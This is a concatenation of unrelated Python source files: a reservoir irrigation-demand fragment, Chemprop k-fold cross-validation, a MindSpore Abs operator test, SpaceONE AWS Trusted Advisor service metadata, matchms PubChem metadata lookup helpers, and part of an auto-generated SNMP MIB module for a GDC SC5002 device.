if seg_tosum in hrus_shp['PFAF'].values:
demand_tosum = hrus_shp.loc[hrus_shp['PFAF']==seg_tosum, 'basinIrrig'].values[0] * seg_weight
demand_tot = demand_tot + demand_tosum
# store in dict per reservoir
demand_dict[reservoir] = demand_tot
count = count+1
return demand_dict
|
from collections import defaultdict
import csv
import json
from logging import Logger
import os
import sys
from typing import Callable, Dict, List, Tuple
import subprocess
import numpy as np
import pandas as pd
from .run_training import run_training
from chemprop.args import TrainArgs
from chemprop.constants import TEST_SCORES_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_task_names, MoleculeDataset, validate_dataset_type
from chemprop.utils import create_logger, makedirs, timeit
from chemprop.features import set_extra_atom_fdim, set_extra_bond_fdim, set_explicit_h, set_reaction, reset_featurization_parameters
@timeit(logger_name=TRAIN_LOGGER_NAME)
def cross_validate(args: TrainArgs,
train_func: Callable[[TrainArgs, MoleculeDataset, Logger], Dict[str, List[float]]]
) -> Tuple[float, float]:
"""
Runs k-fold cross-validation.
For each of k splits (folds) of the data, trains and tests a model on that split
and aggregates the performance across folds.
:param args: A :class:`~chemprop.args.TrainArgs` object containing arguments for
loading data and training the Chemprop model.
:param train_func: Function which runs training.
:return: A tuple containing the mean and standard deviation performance across folds.
"""
logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
if logger is not None:
debug, info = logger.debug, logger.info
else:
debug = info = print
# Initialize relevant variables
init_seed = args.seed
save_dir = args.save_dir
args.task_names = get_task_names(path=args.data_path, smiles_columns=args.smiles_columns,
target_columns=args.target_columns, ignore_columns=args.ignore_columns)
# Print command line
debug('Command line')
debug(f'python {" ".join(sys.argv)}')
# Print args
debug('Args')
debug(args)
# Save args
makedirs(args.save_dir)
try:
args.save(os.path.join(args.save_dir, 'args.json'))
except subprocess.CalledProcessError:
debug('Could not write the reproducibility section of the arguments to file, thus omitting this section.')
args.save(os.path.join(args.save_dir, 'args.json'), with_reproducibility=False)
#set explicit H option and reaction option
reset_featurization_parameters(logger=logger)
set_explicit_h(args.explicit_h)
set_reaction(args.reaction, args.reaction_mode)
# Get data
debug('Loading data')
data = get_data(
path=args.data_path,
args=args,
logger=logger,
skip_none_targets=True,
data_weights_path=args.data_weights_path
)
validate_dataset_type(data, dataset_type=args.dataset_type)
args.features_size = data.features_size()
if args.atom_descriptors == 'descriptor':
args.atom_descriptors_size = data.atom_descriptors_size()
args.ffn_hidden_size += args.atom_descriptors_size
elif args.atom_descriptors == 'feature':
args.atom_features_size = data.atom_features_size()
set_extra_atom_fdim(args.atom_features_size)
if args.bond_features_path is not None:
args.bond_features_size = data.bond_features_size()
set_extra_bond_fdim(args.bond_features_size)
debug(f'Number of tasks = {args.num_tasks}')
if args.target_weights is not None and len(args.target_weights) != args.num_tasks:
raise ValueError('The number of provided target weights must match the number and order of the prediction tasks')
# Run training on different random seeds for each fold
all_scores = defaultdict(list)
for fold_num in range(args.num_folds):
info(f'Fold {fold_num}')
args.seed = init_seed + fold_num
args.save_dir = os.path.join(save_dir, f'fold_{fold_num}')
makedirs(args.save_dir)
data.reset_features_and_targets()
# If resuming experiment, load results from trained models
test_scores_path = os.path.join(args.save_dir, 'test_scores.json')
if args.resume_experiment and os.path.exists(test_scores_path):
print('Loading scores')
with open(test_scores_path) as f:
model_scores = json.load(f)
# Otherwise, train the models
else:
model_scores = train_func(args, data, logger)
for metric, scores in model_scores.items():
all_scores[metric].append(scores)
all_scores = dict(all_scores)
# Convert scores to numpy arrays
for metric, scores in all_scores.items():
all_scores[metric] = np.array(scores)
# Report results
info(f'{args.num_folds}-fold cross validation')
# Report scores for each fold
for fold_num in range(args.num_folds):
for metric, scores in all_scores.items():
info(f'\tSeed {init_seed + fold_num} ==> test {metric} = {np.nanmean(scores[fold_num]):.6f}')
if args.show_individual_scores:
for task_name, score in zip(args.task_names, scores[fold_num]):
info(f'\t\tSeed {init_seed + fold_num} ==> test {task_name} {metric} = {score:.6f}')
# Report scores across folds
for metric, scores in all_scores.items():
avg_scores = np.nanmean(scores, axis=1) # average score for each model across tasks
mean_score, std_score = np.nanmean(avg_scores), np.nanstd(avg_scores)
info(f'Overall test {metric} = {mean_score:.6f} +/- {std_score:.6f}')
if args.show_individual_scores:
for task_num, task_name in enumerate(args.task_names):
info(f'\tOverall test {task_name} {metric} = '
f'{np.nanmean(scores[:, task_num]):.6f} +/- {np.nanstd(scores[:, task_num]):.6f}')
# Save scores
with open(os.path.join(save_dir, TEST_SCORES_FILE_NAME), 'w') as f:
writer = csv.writer(f)
header = ['Task']
for metric in args.metrics:
header += [f'Mean {metric}', f'Standard deviation {metric}'] + \
[f'Fold {i} {metric}' for i in range(args.num_folds)]
writer.writerow(header)
if args.dataset_type == 'spectra': # spectra data type has only one score to report
row = ['spectra']
for metric, scores in all_scores.items():
task_scores = scores[:,0]
mean, std = np.nanmean(task_scores), np.nanstd(task_scores)
row += [mean, std] + task_scores.tolist()
writer.writerow(row)
else: # all other data types, separate scores by task
for task_num, task_name in enumerate(args.task_names):
row = [task_name]
for metric, scores in all_scores.items():
task_scores = scores[:, task_num]
mean, std = np.nanmean(task_scores), np.nanstd(task_scores)
row += [mean, std] + task_scores.tolist()
writer.writerow(row)
# Determine mean and std score of main metric
avg_scores = np.nanmean(all_scores[args.metric], axis=1)
mean_score, std_score = np.nanmean(avg_scores), np.nanstd(avg_scores)
# Optionally merge and save test preds
if args.save_preds:
all_preds = pd.concat([pd.read_csv(os.path.join(save_dir, f'fold_{fold_num}', 'test_preds.csv'))
for fold_num in range(args.num_folds)])
all_preds.to_csv(os.path.join(save_dir, 'test_preds.csv'), index=False)
return mean_score, std_score
def chemprop_train() -> None:
"""Parses Chemprop training arguments and trains (cross-validates) a Chemprop model.
This is the entry point for the command line command :code:`chemprop_train`.
"""
cross_validate(args=TrainArgs().parse_args(), train_func=run_training)
|
import mindspore
import numpy as np
from mindspore import context, ms_function
from mindspore import nn, Tensor
from mindspore.ops import GradOperation, operations as P
context.set_context(device_target="CPU")
context.set_context(mode=context.GRAPH_MODE)
class OpNetWrapper(nn.Cell):
def __init__(self, op, *args, **kwargs):
super(OpNetWrapper, self).__init__()
self.op = op
self.args = args
self.kwargs = kwargs
def construct(self, *inputs):
return self.op(*inputs, *self.args, **self.kwargs)
class Grad(nn.Cell):
def __init__(self, network):
super(Grad, self).__init__()
self.grad = GradOperation(get_all=True, sens_param=True)
self.network = network
@ms_function
def construct(self, input_, output_grad):
return self.grad(self.network)(input_, output_grad)
########################################################################################################################
# Test Code
########################################################################################################################
def test_00_base():
op = P.Abs()
op_wrapper = OpNetWrapper(op)
input_x = Tensor(np.array([-1, 0, 1]), mindspore.float32)
outputs = op_wrapper(input_x)
print("input is:", input_x)
print("output is:", outputs)
assert np.allclose(outputs.asnumpy(), [1., 0., 1.])
def test_01_grad():
op = P.Abs()
op_wrapper = OpNetWrapper(op)
input_x = Tensor(np.array([-3, -2, -1, -0, 0, 1, 2, 3]), mindspore.float32)
outputs = op_wrapper(input_x)
sens = Tensor(np.arange(int(np.prod(outputs.shape))).reshape(outputs.shape), mindspore.float32)
backward_net = Grad(op_wrapper)
input_grad = backward_net(input_x, sens)
print("input is:", input_x)
print("outputs is:", outputs)
print("sens is:", sens.asnumpy())
print("input_grad is:", input_grad[0].asnumpy())
assert np.allclose(input_grad[0].asnumpy(), [-0., -1., -2., 0., 0., 5., 6., 7.])
if __name__ == '__main__':
test_00_base()
test_01_grad()
|
"""A package of the implementation of the Conjugate Gradient solver for project 1.""" |
from spaceone.inventory.libs.schema.metadata.dynamic_field import TextDyField, SearchField, EnumDyField
from spaceone.inventory.libs.schema.cloud_service_type import CloudServiceTypeResource, CloudServiceTypeResponse, \
CloudServiceTypeMeta
cst_ta = CloudServiceTypeResource()
cst_ta.name = 'Check'
cst_ta.provider = 'aws'
cst_ta.group = 'TrustedAdvisor'
cst_ta.labels = ['Management']
cst_ta.is_primary = True
cst_ta.tags = {
'spaceone:icon': 'https://spaceone-custom-assets.s3.ap-northeast-2.amazonaws.com/console-assets/icons/cloud-services/aws/AWS-Trusted-Advisor.svg',
}
cst_ta._metadata = CloudServiceTypeMeta.set_meta(
fields=[
TextDyField.data_source('Category', 'data.category'),
TextDyField.data_source('Name', 'data.name'),
EnumDyField.data_source('Status', 'data.status', default_state={
'safe': ['ok'],
'warning': ['warning'],
'alert': ['error'],
'disable': ['not_available']
}),
TextDyField.data_source('Check ID', 'data.check_id'),
],
search=[
SearchField.set(name='Check ID', key='data.check_id'),
SearchField.set(name='Category', key='data.category'),
SearchField.set(name='Status', key='data.status'),
SearchField.set(name='AWS Account ID', key='data.account_id'),
]
)
CLOUD_SERVICE_TYPES = [
CloudServiceTypeResponse({'resource': cst_ta}),
]
|
import logging
import re
import pubchempy as pcp
import numpy as np
from matchms.utils import is_valid_inchikey
logger = logging.getLogger("matchms")
def pubchem_metadata_lookup(spectrum_in, name_search_depth=10, match_precursor_mz=False,
formula_search=False,
mass_tolerance=2.0,
allowed_differences=[(18.03, 0.01)],
min_formula_length=6,
formula_search_depth=25,
verbose=2):
"""
Parameters
----------
spectrum_in
Matchms type spectrum as input.
name_search_depth: int
How many of the most relevant name matches to explore deeper. Default = 10.
"""
if spectrum_in is None:
return None
if is_valid_inchikey(spectrum_in.get("inchikey")):
return spectrum_in
spectrum = spectrum_in.clone()
def _plausible_name(compound_name):
return (isinstance(compound_name, str) and len(compound_name) > 4)
compound_name = spectrum.get("compound_name")
if not _plausible_name(compound_name):
logger.info("No plausible compound name found (%s)", compound_name)
return spectrum
# Start pubchem search
inchi = spectrum.get("inchi")
parent_mass = spectrum.get("parent_mass")
if isinstance(parent_mass, np.ndarray):
parent_mass = parent_mass[0]
formula = spectrum.get("formula")
# 1) Search for matching compound name
results_pubchem = pubchem_name_search(compound_name, name_search_depth=name_search_depth,
verbose=verbose)
if len(results_pubchem) > 0:
logger.info("Found potential matches for compound name (%s) on PubChem",
compound_name)
# 1a) Search for matching inchi
if likely_has_inchi(inchi):
inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_inchi_match(results_pubchem, inchi,
verbose=verbose)
# 1b) Search for matching parent mass
if not likely_has_inchi(inchi) or inchikey_pubchem is None:
inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
parent_mass,
given_mass="parent mass",
mass_tolerance=mass_tolerance,
allowed_differences=allowed_differences,
verbose=verbose)
# 1c) Search for matching precursor mass (optional)
if match_precursor_mz and inchikey_pubchem is None:
precursor_mz = spectrum.get("precursor_mz")
inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
precursor_mz,
given_mass="precursor mass",
mass_tolerance=mass_tolerance,
allowed_differences=allowed_differences,
verbose=verbose)
if inchikey_pubchem is not None and inchi_pubchem is not None:
logger.info("Matching compound name: %s", compound_name)
spectrum.set("inchikey", inchikey_pubchem)
spectrum.set("inchi", inchi_pubchem)
spectrum.set("smiles", smiles_pubchem)
return spectrum
if verbose >= 2:
logger.info("No matches found for compound name: %s", compound_name)
else:
logger.info("No matches for compound name (%s) on PubChem",
compound_name)
# 2) Search for matching formula
if formula_search and formula and len(formula) >= min_formula_length:
results_pubchem = pubchem_formula_search(formula, formula_search_depth=formula_search_depth,
verbose=verbose)
if len(results_pubchem) > 0:
logger.info("Found potential matches for formula (%s) on PubChem",
formula)
# 2a) Search for matching inchi
if likely_has_inchi(inchi):
inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_inchi_match(results_pubchem, inchi,
verbose=verbose)
# 2b) Search for matching parent mass
if inchikey_pubchem is None:
inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
parent_mass,
given_mass="parent mass",
mass_tolerance=mass_tolerance,
allowed_differences=allowed_differences,
verbose=verbose)
# 2c) Search for matching precursor mass (optional)
if match_precursor_mz and inchikey_pubchem is None:
precursor_mz = spectrum.get("precursor_mz")
inchi_pubchem, inchikey_pubchem, smiles_pubchem = find_pubchem_mass_match(results_pubchem,
precursor_mz,
given_mass="precursor mass",
mass_tolerance=mass_tolerance,
allowed_differences=allowed_differences,
verbose=verbose)
if inchikey_pubchem is not None and inchi_pubchem is not None:
logger.info("Matching formula: %s", formula)
if verbose >= 1:
logger.info("Matching formula: %s", formula)
spectrum.set("inchikey", inchikey_pubchem)
spectrum.set("inchi", inchi_pubchem)
spectrum.set("smiles", smiles_pubchem)
return spectrum
if verbose >= 2:
logger.info("No matches found for formula: %s", formula)
else:
logger.info("No matches for formula (%s) on PubChem",
formula)
return spectrum
def likely_has_inchi(inchi):
"""Quick test to avoid excess in-depth testing"""
if inchi is None:
return False
inchi = inchi.strip('"')
regexp = r"(InChI=1|1)(S\/|\/)[0-9, A-Z, a-z,\.]{2,}\/(c|h)[0-9]"
if not re.search(regexp, inchi):
return False
return True
def likely_inchi_match(inchi_1, inchi_2, min_agreement=3):
"""Try to match defective inchi to non-defective ones.
Compares inchi parts seperately. Match is found if at least the first
'min_agreement' parts are a good enough match.
The main 'defects' this method accounts for are missing '-' in the inchi.
In addition, differences between '-', '+', and '?'will be ignored.
Parameters
----------
inchi_1: str
inchi of molecule.
inchi_2: str
inchi of molecule.
min_agreement: int
Minimum number of first parts that MUST be a match between both input
inchi to finally consider it a match. Default is min_agreement=3.
"""
if min_agreement < 2:
logger.warning("Warning! 'min_agreement' < 2 has no discriminative power. Should be => 2.")
if min_agreement == 2:
logger.warning("Warning! 'min_agreement' == 2 has little discriminative power",
"(only looking at structure formula. Better use > 2.")
agreement = 0
# Remove spaces and '"' to account for different notations.
# Remove everything with little discriminative power.
ignore_lst = ['"', ' ', '-', '+', '?']
for ignore in ignore_lst:
inchi_1 = inchi_1.replace(ignore, '')
inchi_2 = inchi_2.replace(ignore, '')
# Split inchi in parts.
inchi_1_parts = inchi_1.split('/')
inchi_2_parts = inchi_2.split('/')
# Check if both inchi have sufficient parts (seperated by '/')
if len(inchi_1_parts) >= min_agreement and len(
inchi_2_parts) >= min_agreement:
# Count how many parts agree well
for i in range(min_agreement):
agreement += (inchi_1_parts[i] == inchi_2_parts[i])
return bool(agreement == min_agreement)
def likely_inchikey_match(inchikey_1, inchikey_2, min_agreement=1):
"""Try to match inchikeys.
Compares inchikey parts seperately. Match is found if at least the first
'min_agreement' parts are a good enough match.
Parameters
----------
inchikey_1: str
inchikey of molecule.
inchikey_2: str
inchikey of molecule.
min_agreement: int
Minimum number of first parts that MUST be a match between both input
inchikey to finally consider it a match. Default is min_agreement=1.
"""
if min_agreement not in [1, 2, 3]:
logger.error("Warning! 'min_agreement' should be 1, 2, or 3.")
agreement = 0
# Harmonize strings
inchikey_1 = inchikey_1.upper().replace('"', '').replace(' ', '')
inchikey_2 = inchikey_2.upper().replace('"', '').replace(' ', '')
# Split inchikey in parts.
inchikey_1_parts = inchikey_1.split('-')
inchikey_2_parts = inchikey_2.split('-')
# Check if both inchikey have sufficient parts (seperated by '/')
if len(inchikey_1_parts) >= min_agreement and len(
inchikey_2_parts) >= min_agreement:
# Count how many parts mostly agree
for i in range(min_agreement):
agreement += (inchikey_1_parts[i] == inchikey_2_parts[i])
return agreement == min_agreement
def pubchem_name_search(compound_name: str, name_search_depth=10, verbose=1):
"""Search pubmed for compound name"""
results_pubchem = pcp.get_compounds(compound_name,
'name',
listkey_count=name_search_depth)
if len(results_pubchem) == 0 and "_" in compound_name:
results_pubchem = pcp.get_compounds(compound_name.replace("_", " "),
'name',
listkey_count=name_search_depth)
if len(results_pubchem) == 0:
return []
logger.debug("Found at least %s compounds of that name on pubchem.", len(results_pubchem))
return results_pubchem
def pubchem_formula_search(compound_formula: str, formula_search_depth=25, verbose=1):
"""Search pubmed for compound formula"""
sids_pubchem = pcp.get_sids(compound_formula,
'formula',
listkey_count=formula_search_depth)
results_pubchem = []
for sid in sids_pubchem:
result = pcp.Compound.from_cid(sid['CID'])
results_pubchem.append(result)
logger.debug("Found at least %s compounds of with formula: %s.",
len(results_pubchem), compound_formula)
return results_pubchem
def find_pubchem_inchi_match(results_pubchem,
inchi,
min_inchi_match=3,
verbose=1):
"""Searches pubmed matches for inchi match.
Then check if inchi can be matched to (defective) input inchi.
Outputs found inchi and found inchikey (will be None if none is found).
Parameters
----------
results_pubchem: List[dict]
List of name search results from Pubchem.
inchi: str
Inchi (correct, or defective...). Set to None to ignore.
min_inchi_match: int
Minimum number of first parts that MUST be a match between both input
inchi to finally consider it a match. Default is min_inchi_match=3.
"""
inchi_pubchem = None
inchikey_pubchem = None
smiles_pubchem = None
# Loop through first 'name_search_depth' results found on pubchem. Stop once first match is found.
for result in results_pubchem:
inchi_pubchem = '"' + result.inchi + '"'
inchikey_pubchem = result.inchikey
smiles_pubchem = result.isomeric_smiles
if smiles_pubchem is None:
smiles_pubchem = result.canonical_smiles
match_inchi = likely_inchi_match(inchi, inchi_pubchem,
min_agreement=min_inchi_match)
if match_inchi:
logger.info("Matching inchi: %s", inchi)
if verbose >= 1:
logger.info("Found matching compound for inchi: %s (Pubchem: %s)",
inchi, inchi_pubchem)
break
if not match_inchi:
inchi_pubchem = None
inchikey_pubchem = None
smiles_pubchem = None
if verbose >= 2:
logger.info("No matches found for inchi %s.", inchi)
return inchi_pubchem, inchikey_pubchem, smiles_pubchem
def find_pubchem_mass_match(results_pubchem,
parent_mass,
mass_tolerance,
given_mass="parent mass",
allowed_differences=[(18.03, 0.01)],
verbose=1):
"""Searches pubmed matches for inchi match.
Then check if inchi can be matched to (defective) input inchi.
Outputs found inchi and found inchikey (will be None if none is found).
Parameters
----------
results_pubchem: List[dict]
List of name search results from Pubchem.
parent_mass: float
Spectrum"s guessed parent mass.
mass_tolerance: float
Acceptable mass difference between query compound and pubchem result.
given_mass
String to specify the type of the given mass (e.g. "parent mass").
"""
inchi_pubchem = None
inchikey_pubchem = None
smiles_pubchem = None
mass_difference = None
lowest_mass_difference = [np.inf, None]
for result in results_pubchem:
inchi_pubchem = '"' + result.inchi + '"'
inchikey_pubchem = result.inchikey
smiles_pubchem = result.isomeric_smiles
if smiles_pubchem is None:
smiles_pubchem = result.canonical_smiles
pubchem_mass = float(results_pubchem[0].exact_mass)
mass_difference = np.abs(pubchem_mass - parent_mass)
if mass_difference < lowest_mass_difference[0]:
lowest_mass_difference[0] = mass_difference
lowest_mass_difference[1] = inchi_pubchem
match_mass = (mass_difference <= mass_tolerance)
for diff in allowed_differences:
match_mass = match_mass or np.isclose(mass_difference, diff[0], atol=diff[1])
if match_mass:
logger.info("Matching molecular weight (%s vs %s of %s)",
pubchem_mass, given_mass, parent_mass)
break
if not match_mass:
inchi_pubchem = None
inchikey_pubchem = None
smiles_pubchem = None
logger.info("No matching molecular weight (best mass difference was %s for inchi: %s)",
lowest_mass_difference[0], lowest_mass_difference[1])
return inchi_pubchem, inchikey_pubchem, smiles_pubchem
|
#
# PySNMP MIB module SC5002-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SC5002-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:00:56 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsIntersection")
SCinstance, = mibBuilder.importSymbols("GDCMACRO-MIB", "SCinstance")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, enterprises, Counter32, iso, NotificationType, TimeTicks, Bits, MibIdentifier, ModuleIdentity, IpAddress, ObjectIdentity, Counter64, Unsigned32, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "enterprises", "Counter32", "iso", "NotificationType", "TimeTicks", "Bits", "MibIdentifier", "ModuleIdentity", "IpAddress", "ObjectIdentity", "Counter64", "Unsigned32", "Gauge32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
gdc = MibIdentifier((1, 3, 6, 1, 4, 1, 498))
dsx1 = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6))
sc5002 = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8))
sc5002Version = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 1))
sc5002NetworkCfg = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 2))
sc5002Alarms = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3))
sc5002Diagnostics = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 4))
sc5002Maintenance = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 5))
sc5002Performance = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 6))
sc5002MIBversion = MibScalar((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(5, 5)).setFixedLength(5)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002MIBversion.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002MIBversion.setDescription("Identifies the version of the MIB. The format of the version is x.yzT, where 'x' identifies the major revision number, 'y' identifies the minor revision number, 'z' identifies the typographical revision, and T identifies the test revision. Upon formal release, no designation for the test revision will be present. Acceptable values for the individual revision components are as follows: x: 1 - 9, y: 0 - 9, z: 0 - 9, T: A - Z")
sc5002VersionTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2), )
if mibBuilder.loadTexts: sc5002VersionTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002VersionTable.setDescription(' ')
sc5002VersionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002VersionIndex"))
if mibBuilder.loadTexts: sc5002VersionEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002VersionEntry.setDescription('An entry in the GDC SC5002 Version Table.')
sc5002VersionIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002VersionIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002VersionIndex.setDescription('Identifies Version parameters associated with the managed object.')
sc5002ActiveFirmwareRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002ActiveFirmwareRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002ActiveFirmwareRev.setDescription('The version number of the firmware currently executing. The format is MM.NN.BB where: MM: Major Revision (0-99) NN: Minor Revision (0-99) BB: Bug Fix Revision (0-99) ')
sc5002StoredFirmwareRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(8, 8)).setFixedLength(8)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002StoredFirmwareRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002StoredFirmwareRev.setDescription('The version number of the firmware stored (in a compressed format) but not currently executing. MM: Major Revision (0-99) NN: Minor Revision (0-99) BB: Bug Fix Revision (0-99) ')
sc5002BootRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002BootRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002BootRev.setDescription('The version number of the bootstrap firmware. The version number of the firmware, to allow products to know which revision is installed. The released version number is sequenced from --, A-, ... AA, ... ZZ. ')
sc5002StoredFirmwareStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("statBlank", 1), ("statDownLoading", 2), ("statOK", 3), ("statCheckSumBad", 4), ("statUnZipping", 5), ("statBadUnZip", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002StoredFirmwareStatus.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002StoredFirmwareStatus.setDescription('This object represents the state of the Non-Active or Stored firmware: statBlank(1) Factory Default statDownLoading(2) In process of downloading firmware statOK(3) Zipped version checksum succesful (OK to switch) (can set sc5002SwitchActive to switchActive(2)) statCheckSumBad(4) Failed checksum after download statUnZipping(5) In process of uncompressing into active area statBadUnZip(6) Failed last uncompress The object is read only. ')
sc5002SwitchActiveFirmware = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("switchNorm", 1), ("switchActive", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002SwitchActiveFirmware.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002SwitchActiveFirmware.setDescription('This object is used to switch the active executing firmware from the version in sc5002ActiveRev to the version in sc5002StoredRev. When a switchActive(2) is set (write only) the element will: 1) reboot 2) uncompress stored code into active area 3) perform checksum on active area 4) Set sc5002StoredStatus object to indicate results 5) If succesfull: update sc5002ActiveFirmwareRev and sc5002StoredFirmwareRev and begin executing If failed: replace active area with previous revision The switchNorm(1) enumeration will always be read. Setting switchActive(2) when the sc5002StoredStatus is not statOK(3) will result in an error. ')
sc5002DownloadingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("disableAll", 1), ("enableAndWait", 2), ("enableAndSwitch", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002DownloadingMode.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002DownloadingMode.setDescription('This object is used to configure the download mode: disableAll(1) Prevents any firmware downloading to SC5002 enableAndWait(2) Allows downloading zipped code to be stored only! enableAndSwitch(3) Allows downloading and then unzips and begins executing the new code ')
sc5002FirmwareRev = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 1, 2, 1, 8), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(2, 2)).setFixedLength(2)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FirmwareRev.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FirmwareRev.setDescription('The version number of the firmware. Released versions are sequenced from --, A-, ... AA, ... ZZ. Test versions are from 01 to 99.')
sc5002NetworkCfgTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1), )
if mibBuilder.loadTexts: sc5002NetworkCfgTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NetworkCfgTable.setDescription('This table contains objects that support the specific management requirements for configuring the SC5002 Network Interface level objects.')
sc5002NetworkCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NetworkCfgIndex"))
if mibBuilder.loadTexts: sc5002NetworkCfgEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NetworkCfgEntry.setDescription('The sc5002 Network Configuration Table Entry.')
sc5002NetworkCfgIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NetworkCfgIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NetworkCfgIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002E1SignalingMode = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("assocChanSigWithCRC4", 1), ("assocChanSigNoCRC4", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sc5002E1SignalingMode.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002E1SignalingMode.setDescription('Specifies the channel signaling scheme for the E1 network interface.')
sc5002AlarmData = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1))
sc5002NoResponse = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 1))
sc5002DiagRxErr = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 2))
sc5002PowerUp = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 3))
sc5002NvRamCorrupt = MibIdentifier((1, 3, 6, 1, 4, 1, 498, 6, 8, 3, 1, 4))
